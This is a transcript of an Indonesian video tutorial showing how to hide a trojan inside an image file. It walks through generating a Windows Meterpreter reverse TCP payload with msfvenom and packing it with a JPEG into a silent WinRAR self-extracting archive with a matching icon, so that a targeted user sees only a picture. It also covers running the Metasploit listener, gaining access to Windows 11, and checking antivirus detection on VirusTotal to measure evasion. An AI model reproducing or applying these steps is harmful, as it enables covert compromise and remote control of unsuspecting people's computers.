Di video kali ini kita akan belajar cara memasukkan Trojan yang kita buat ke dalam sebuah file yang berupa image atau gambar. Oke. Nah, hal ini kita lakukan untuk untuk mengelabui seorang user. Dalam hal ini adalah user dari target system yang ingin kita exploit, supaya dia tidak curiga bahwa file yang kita kirim ke dia, baik itu melalui email ataupun melalui apapun, itu merupakan sebuah malware atau virus ataupun trojan. Oke, karena yang kita kirim itu adalah sebuah gambar. Ketika dibuka, yang terbuka hanyalah sebuah gambar dan tidak ada yang lain yang terbuka sehingga dia tidak curiga sama sekali. Oke. Nah, pertama, tentu kita harus memiliki gambar dulu. Kita akan buka Google dan download sebuah gambar. Misalnya kita cari gambar Gunung Bromo misalnya, Gunung Bromo. Oke. Gambar. Oke. Ya. Kita coba yang ini. Oke. Kita save image as. Oke, kita save di desktop saja biar lebih mudah dilihat nanti. Ya, kita beri nama Gunung atau Bromo ya. Bromo atau Gunung Bromo. Gunung Bromo. Gunung Bromo. Dan file ini adalah dalam bentuk JPEG. Oke, kita save di desktop. Oke, setelah kita save di desktop, kita akan convert image-nya menjadi icon. Untuk itu kita ketik di sini JPEG to ICO, oke. Mungkin kita tambah di sini converter. JPEG to ICO converter. Nah, kita lihat di sini ada link JPEG to ICO converter freeconvert.com. Oke, kita klik link yang itu. Dan sini kita choose file. Kita ke desktop. Kita buka, kita pilih image yang kita simpan di desktop tadi. Ya, ini dia Gunung Bromo. Open. Oke, kemudian klik convert to ICO. Oke, setelah selesai convert to ICO, di sini kita save to device ataupun kita klik sini download. Oke, download ICO. Nah, ini sedang di-download. Oke, kita open folder. Dan ini kita pindahkan juga ke desktop. Oke, kita cut saja. Kemudian ini kita tutup. Kita paste di desktop. Oke, nah sekarang kita sudah punya dua buah image. Oke, kita taruh di sini biar lebih jelas. Yang satu adalah JPEG. Ya, ini adalah JPEG. Yang satunya lagi adalah ICO untuk icon. Oke. Nah, selanjutnya kita harus membuat sebuah payload lagi. Dan payload yang akan kita buat ini akan kita masukkan nanti ke dalam gambar Gunung Bromo tersebut. Oke, kita sudah tahu cara membuat payload sebelumnya. Kita gunakan MSF Venom. Oke, kemudian kita masukkan payload 64 bitnya, meter-preter, reverse TCP, kemudian all host-nya. Oke, all host-nya kita cek all host-nya, buka new tab, if config, oke, 192.168.202.212, oke. All host sama dengan 192.168.202.212. Kemudian all port sama dengan 9999. Kemudian formatnya exe, outputnya kita beri nama misalnya venom.exe. Oke.
tekan enter. Oke, nah sekarang kita sudah memiliki file dengan nama venom.exe yang merupakan Trojan. Oke, selanjutnya kita akan copy venom.exe ini ke dalam set folders. Oke, kita buka di sini, home, open folder. Kita cari tadi file venomnya. Di mana dia? Ini dia venom.exe. Kita copy, kemudian pindahkan ke dalam sf bvox folder. Oke, kita paste di sini. Oke, setelah kita paste ke situ, kita kembali ke Windows tadi. Kita buka folder, set foldernya, yaitu msf, oh bukan ya vbox folder. Oke, vbox folder. Kemudian venom ini kita kirimkan ke desktop atau kita copy ya. Copy, kemudian paste di sini di desktop. Oke, ini dia venom. Kita akan membuat file venom.exe ini menyatu dengan file gambar Gunung Bromo ini. Dan ketika dibuka nanti yang muncul adalah gambarnya dan tidak nampak file exe-nya terbuka. Oke. Untuk melakukan hal tersebut, kita select keduanya, kemudian klik kanan, kemudian pilih WinRAR, kemudian pilih Add to Archive. Jika kalian tidak punya WinRAR, kalian harus download dulu WinRAR di Google ya. Nah, kemudian pilih Add to Archive. Nah, di sini kalian bisa ganti namanya. Oke, misal namanya Bromo, oke, atau Gunung Bromo. Kemudian di sini kita pilih zip, kemudian checklist pada create SFX archive. Oke. Kemudian pada advance ini kita klik pada SFX options. Oke. Kemudian kita pergi ke setup. Di setup ini kita masukkan nama file Gunung Bromo ya. Gunung Bromo titik, kita langsung masukkan ekstensinya titik jpg. Kemudian di bawahnya kita masukkan venom.exe, venom.exe. Oke, setelah itu kita pergi ke mode. Untuk mode ini kita checklist yang unpack to temporary folder. Kemudian yang silent mode ini kita pilih hide all. Kita pindah ke advance. Oke, di sini tidak ada. Kita pindah ke modul, juga tidak ada yang perlu kita rubah. Oke, kemudian text. Ya, ikonnya ini. Ya, text and icon. Yang paling bawah ini, kita akan masukkan icon yang ini. Oke. Load aspect icon from the file. Kita browse. Ya, kita simpan di desktop. Ini dia ikonnya. Open. Oke, setelah itu tidak ada lagi yang perlu kita isi. Update. Ya, yang update ini, kita pilih override all files. Oke. Nah, setelah selesai semuanya, klik OK, kemudian klik OK. Dan kita bisa lihat di sini ada ikon Gunung Bromo yang merupakan gambar. Oke. Dan jika file ini kita klik, kita buka, maka yang akan muncul adalah gambar Gunung Bromo. Tetapi kita sebenarnya sudah menjalankan Trojan yang memberikan kita akses kepada Kali Linux ini. Oke, untuk itu kita buka listener-nya di sini, MSF console.
Oke, seperti sebelumnya kita gunakan exploit multi handler, enter, kemudian kita show option. Ya, kita set lhouse-nya, set lhouse 192.168.202.212. Oke, kemudian set lport 9999. Kemudian kita set payload. Ini adalah payloadnya. Kita akan jadikan payloadnya menjadi meter preter ya. Set payload Windows x64 meter meter preter reverse TCP. Oke. Kemudian kita run. Oke, dia akan menunggu koneksi. Kita akan letakkan di samping. Oke, kita akan jalankan file Gunung Bromo ini. Kita akan lihat apakah akan bisa tersambung ke sini atau tidak. Oke, kita klik 2 kali. Oh, nampaknya ada kesalahan nama Gunung Bromo.jpg. Make sure you type the correct name. Oke. Mungkin ada kesalahan nama. Tetapi kita lihat di sini meter preternya sudah berjalan ya. Kita sudah berhasil mengeksploit Windows 11 dengan Trojan. Oke, tetapi problemnya tadi gambarnya tidak terbuka. Untuk itu kita akan ulang lagi. Kita exit saja ini. Oke. Kita exit. Kita ulang lagi. Ini Gunung Bromo. Kita akan lihat file ekstensinya JPEG. Oke. Coba kita ke Windows. Di sini pada View, pilih Show, pilih File Name Extension. Kita akan lihat ekstensinya. Kita robah namanya biar lebih singkat ya. Rename Bromo. Ya, kita buat menjadi Bromo saja ya. Bromo.jpeg. Oke, ternyata tadi ada kesalahan nama ya, ekstensi. Oke, kita akan ulang saja. Dan ini kita hapus. Kita ulang. Klik kanan. WinRAR, add to archive. Kemudian di sini create SFX archive. Di sini zip. Kemudian pada advance ini SFX option. Pada setup masukkan namanya yang cocok, bromo.jpeg. Oke, kemudian venom.exe. Oke, kemudian mode unpack, dan sini hide all. Kemudian advance tidak ada, modules tidak ada, license tidak ada, text and icon kita pilih ikonnya. Oke. Setup sudah, update sudah. Ya, yang di-update ini belum ya. Update-nya adalah override all files, oke. Kemudian klik OK. Di sini namanya jangan lupa kita ganti namanya menjadi Bromo atau Gunung Bromo biar lebih meyakinkan, oke. Kemudian klik OK. Dan sekarang kita sudah selesai membuatnya lagi. Kita akan coba jalankan lagi meter preternya. Listenernya di sini kita exploit atau run. Oke, dia akan menunggu koneksi lagi. Kita jalankan lagi. Ya, kita memilih aplikasi yang kita gunakan untuk membuka file. Dan kita lihat di sini fotonya terbuka, oke. Dan di sini kita sudah memiliki akses pada Windows 11. Kita ulang lagi, coba exit lagi. Oke, kita run atau exploit. Kita ulang lagi bukanya. Oke, nah sekarang kita hanya melihat gambar seperti biasa, image seperti biasa, tapi kita tidak tahu bahwa di balik image itu ada payload, ada Trojan yang berjalan, yang memberikan
hacker akses melalui interpreter di sini. Oke. Get UID. Oke. Oke, ifconfig. Ya, kalian bisa jalankan semua komen-komen yang ada di interpreter seperti pada video sebelumnya. Oke, itulah cara kita memasukkan Trojan ke dalam gambar, oke, untuk meyakinkan user dari target system yang ingin kita exploit bahwa yang kita kirim itu bukanlah sebuah file berbahaya, tetapi merupakan sebuah gambar. Karena ketika dia buka, itu hanyalah sebuah gambar biasa. Oke, ini kita exit lagi. Kita akan coba masukkan file ini ke dalam virus total. Kita akan lihat. Kita buka virus total di sini saja ya. Virus total. Ya, ini buka di sini virus total. Ya, sebelumnya di video yang kita buat sebelumnya itu Trojan yang kita masukkan ke dalam virus total itu dideteksi oleh sebanyak 52 antivirus. Sekarang kita akan coba yang ini, apakah akan bisa terdeteksi lebih sedikit dari sebelumnya. Kayak ini Gunung Bromo.exe, oke. Confirm upload. Ya, masih banyak antivirus yang masih bisa mendeteksi Trojan kita, walaupun sudah kita masukkan ke dalam sebuah image ya. Ya, nanti kita akan pelajari trik-trik cara menghindari antivirus ataupun Windows Defender pada Trojan yang kita buat. Oke. Terus sekarang kita akan tunggu dulu berapa antivirus yang bisa mendeteksi file Trojan kita ini. Oke. Nah, tetapi ada bedanya dari file Trojan sebelumnya. Sebelumnya, ketika kita upload ke virus total tanpa menggunakan image, jadi virus Trojan yang kita buat sebelumnya itu adalah Trojan yang biasa yang tidak kita masukkan ke dalam image, itu bisa dideteksi oleh sebanyak 52 antivirus ya. Nah, sekarang ketika sudah kita masukkan ke dalam image, itu sudah berkurang menjadi 45 antivirus dari 70 total antivirus yang ada di virus total ini. Oke. Jadi kita sudah berhasil melewati beberapa antivirus. Oke, kita akan masih lanjutkan tentang Trojan di part berikutnya.